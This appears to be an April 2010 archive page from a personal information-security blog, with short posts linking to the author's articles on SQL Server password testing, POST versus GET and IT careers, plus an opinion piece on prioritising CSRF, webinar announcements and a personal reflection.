You can't secure what you don't acknowledge.SM

Saturday, April 17, 2010

Essentials for cracking SQL Server passwords

Looking to check the resiliency of your Microsoft SQL Server systems? You may very well find that you don't have to look much further than weak/blank passwords to gain full access. I've come across a few vulnerable SQL Server systems via manual analysis. However, I couldn't live without a small set of SQL Server password cracking tools that you should check out as well.

Here's a piece I wrote that can help you get started:

Password cracking tools for SQL Server

Thursday, April 15, 2010

Using POST vs. GET

Here's a piece I wrote recently for

Why use POST vs. GET to keep applications secure

Sure, it's not cut and dried but use the wrong one when you could've used the other, the resulting vulnerabilities can get ugly.

Job hunting? How you can stand out & kick your competitors' butts

Looking for a job in IT or infosec? Here's what you need to do:

Getting hired in IT: How to stand out

CSRF doesn't matter?? The sky is falling!

Here's a great piece where something I wrote put a grown man with a hacker handle's boxers in a bunch. With all due respect to what Robert has contributed to our field, he is missing the point of my 8 sentence statement about cross-site request forgery (CSRF) not being a top priority. It reminds of me when I wrote about Changes coming to the OWASP Top 10 in 2010. [Boy, some of the "leet" in our field get cranky in a hurry when you say anything that's contrary to their experience!]

What I said was based on what I'm seeing in my work I don't think CSRF is as big of a deal - or perhaps I should say as top of a priority - as some of the vendors and Top 10 lists characterize it.

Sure, CSRF is still an issue...but what's the context? What's the perspective? What systems or sensitive information are being placed at risk? How does it affect the business? Based on what I see it's just not there and when it is, it's usually not as big of a deal as many of the other Web security gaffes we really should be focusing our efforts on.

Robert's blind railing against what I said is overlooks my consistent rants I have about NOT relying on tools to find security flaws like what I wrote about here and here and here and here and here. But who am I to question things...

It's so funny how some people worry about picking knits when there's an elephant in the room. It's all about priorities folks - we have to prioritize things and focus on the urgent and the important. If you find CSRF that's creating an urgent situation, then you better address it quick! Likewise with XSS, SQL injection, weak passwords, authentication mechanism flaws, and so on. But you've got to focus on what matters to your business in the context of your business - not just what some vendor, Top 10 list, or blogger says is important. Every situation - every application - is different.

There's something about our field - I've met many people over the years who like to find any flaw they can that's even remotely exploitable - regardless of whether or not it really matters in the grand scheme of things - and make a big deal out of it to justify their expertise and their existence. Given all the issues we face in information security today, that approach just doesn't add up.

Wednesday, April 14, 2010

A simple yet highly-effective career booster

One of the best things you can ever do for your career in IT or information security is to network, network, network. It's all about who knows you. Here's what it takes:

Networking to enhance your IT career

Tuesday, April 13, 2010

My (other) webinar this week: Strategies for Securing your Enterprise for Success

If you're around at 2pm ET this Thursday (tax day, woohoo!) please join me for another free webinar: Strategies for Securing your Enterprise for Success

As with all my webinars/webcasts I'll keep it short and sweet - I'll talk for ~20 minutes and we'll have a Q&A at the end.

You can register here:

"See" you there!

My webinar this week: Data Protection: The Realities of Proactive vs. Reactive

Join me tomorrow around lunchtime (or breakfast depending on where you're at) for a webinar on Data Protection: The Realities of Proactive vs. Reactive

I'm going to talk for ~20 minutes and we'll have a Q&A at the end.

It's at
12pm ET and you can register here:

Hope to "see" you there!

Monday, April 12, 2010

View every day as a blessing

Between losing both grandmothers and helping my mom through a serious struggle she's having with cancer over the past 4 weeks combined with this news about Brian Tracy who has been a wonderful inspiration and mentor to me I'm compelled to say: View every day as a blessing for we truly don't know how much time we have here on Earth.